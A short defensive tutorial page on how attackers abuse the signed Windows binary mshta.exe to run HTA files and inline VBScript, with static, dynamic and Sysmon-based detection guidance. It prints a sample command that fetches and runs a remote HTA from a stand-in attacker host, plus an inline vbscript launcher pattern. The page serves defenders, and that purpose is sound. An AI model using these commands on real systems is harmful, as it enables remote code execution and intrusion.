Skip to content
Reverse Engineering
Living off the Landbeginner

Mshta HTA Execution

Attackers abuse the signed mshta.exe to run HTML Applications and inline VBScript/JScript, proxying code execution under a trusted Windows binary.

mshta.exe (Microsoft HTML Application host) is a signed Windows binary that executes .hta files — HTML pages with embedded VBScript or JScript that run with full local trust, outside the browser's security sandbox. Its legitimate use is rare in modern environments, which makes any execution worth a second look.

Attackers abuse mshta.exe because it is Microsoft-signed, often allow-listed, and can execute script either from a local .hta file, from a remote URL, or inline directly on the command line. It is a staple of phishing chains: an email attachment or a macro launches mshta against an attacker-hosted page that bootstraps the next stage.

How it works

mshta can be pointed straight at a remote HTA, which it downloads and runs:

text
mshta.exe http://attacker.example/a.hta

It can also execute script inline using the vbscript:/javascript: moniker, with no file on disk:

text
mshta.exe vbscript:Close(Execute("...downstream launcher..."))

In both cases mshta parses the HTML/script and runs the embedded code with the privileges of the calling user. A typical HTA bootstraps a heavier payload — frequently by spawning powershell.exe with an encoded command. The recognisable indicators for an analyst are an http/https URL passed to mshta, the vbscript:/javascript: prefix, and the Execute(/Eval(/CreateObject( patterns inside the script body.

Detection & analysis

Static analysis:

  • An .hta file is just HTML — open it in a text editor. Look for <script> blocks, CreateObject("WScript.Shell"), Run/Exec, eval/Execute, base64 strings, and downstream powershell/cmd references. Deobfuscate inline string concatenation and Chr()-built strings.
  • Triage the command line with regex/YARA: mshta followed by http/https, vbscript:, javascript:, or a path in a user-writable directory (%TEMP%, %APPDATA%) flags likely abuse.

Dynamic analysis:

  • In a sandbox, observe whether mshta.exe makes outbound network connections (to fetch the remote HTA or beacon) — a strong signal, since legitimate local HTAs do not.
  • Examine the process tree. mshta.exe spawned by winword.exe, excel.exe, outlook.exe, wscript.exe, or cmd.exe, and/or spawning powershell.exe/cmd.exe, is a high-confidence chain indicator.

Detection rule hint:

Alert on Sysmon Event ID 1 where Image ends with \mshta.exe AND (the command line contains http/https/vbscript:/javascript: OR the parent is an Office or mail application). Because legitimate mshta use is uncommon, treating any execution as low-noise hunting telemetry — then correlating with Event ID 3 (network) and child powershell/cmd — is highly effective.

Votes

Comments(0)